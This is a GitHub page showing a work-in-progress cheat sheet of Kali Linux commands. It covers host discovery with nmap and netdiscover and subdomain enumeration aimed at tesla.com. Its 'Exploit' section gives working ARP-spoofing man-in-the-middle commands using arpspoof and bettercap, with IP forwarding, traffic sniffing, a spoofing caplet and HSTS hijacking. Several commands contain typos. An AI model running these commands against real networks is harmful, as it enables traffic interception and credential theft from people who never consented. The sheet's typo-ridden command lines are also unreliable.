-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathKali Linux WIP
50 lines (38 loc) · 1.3 KB
/
Kali Linux WIP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
Discovery/Enumeration:
Discovery i.e Enumeration of Hosts (Operating system, Ip addresses, Ports, services),Shares, Devices(Version, Ip addresses, Ports, services)
netdiscover -r "IP ADDRESS"/"24"
nmap -sn "IP ADDRESS"/"24" - Ping Scan
nmap -T4 -F "IP ADDRESS"/"24" - Quick Scan
nmap -sV -T4 -O -F --version-light "IP ADDRESS"/"24" - Quick Scan Plus
Assetfinder: (Finds Additional Domains)
assetfinder tesla.com >> tesla-sub.txt
Amass:()
amass enum -d tesla.com
HTTPobe:
httprobe -s -p https:443
Exploit:
Spoofing:
Arpspoofing-
ifconfig - To find connected interface
arpspoof -i "Ethernet Interface" -t "Client IP" "Gateway IP"- To spoof on selected iterface
arpspoof -i "Ethernet Interface" -t "Gateway IP" "Client IP" - To spoof the gateway
echo 1 > /proc/sys/net/ipv4/ip_forward - Forward on hacker vm to the gateway - Ip forwarding
Bettercap-
ifconfig - To find connected interface
bettercap -iface "Ethernet Interface"
net.prob on - scan network for hosts
set arp.spoof.fullduplex true
set arp.spoof.targets "Client IP"
arp.spoof "on/off"
net.sniff on - Enable network niffing
bettercap -iface "Ethernet Interface" -caplet "script.cap) runs a custom spoofing script
"
net.probe on
net.recon on
set arp.spoof.fullduplex true
set arp.spoof targets 192.168.0.199
arp.spoof.on
net.sniff on
"
caplets.show
hstshijack